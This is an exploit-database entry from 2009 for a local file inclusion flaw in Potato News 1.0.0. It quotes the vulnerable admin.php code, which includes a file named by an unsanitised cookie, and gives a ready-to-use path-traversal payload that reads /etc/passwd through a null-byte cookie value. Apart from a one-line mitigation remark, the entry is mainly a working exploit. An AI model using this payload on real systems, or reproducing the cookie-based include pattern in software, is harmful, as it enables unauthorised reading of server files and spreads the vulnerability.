header-logo
Suggest Exploit
vendor:
Potato News
by:
x0r
8.8
CVSS
HIGH
LFI
N/A
CWE
Product Name: Potato News
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Potato News 1.0.0

Bugged file is /[path]/admin.php. Exploit: javascript:document.cookie = "user=../../../../../../../../../../etc/passwd%00; path=/"

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

#########################################################################################
[0x01] Informations:

Name           : Potato News 1.0.0
Download       :
http://potato-news.googlecode.com/files/potatonews-1.0.0.zip
Vulnerability  : LFI
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/admin.php

[Code]
	<?PHP
if (isset($_COOKIE["user"])) {
$id = $_COOKIE["user"];
if (file_exists("data/users/$id.php")) {
include ("data/users/$id.php");
if ($usaavatar == "") {
echo "<img height='75px' width='75px' src='images/noav.jpg'/>";

} else {
echo "<img height='75px' width='75px' src='$usaavatar'/>";
}
}
[/code]

#########################################################################################
[0x03] Exploit:

Exploit: javascript:document.cookie =
"user=../../../../../../../../../../etc/passwd%00; path=/"

########################################################################################

# milw0rm.com [2009-02-10]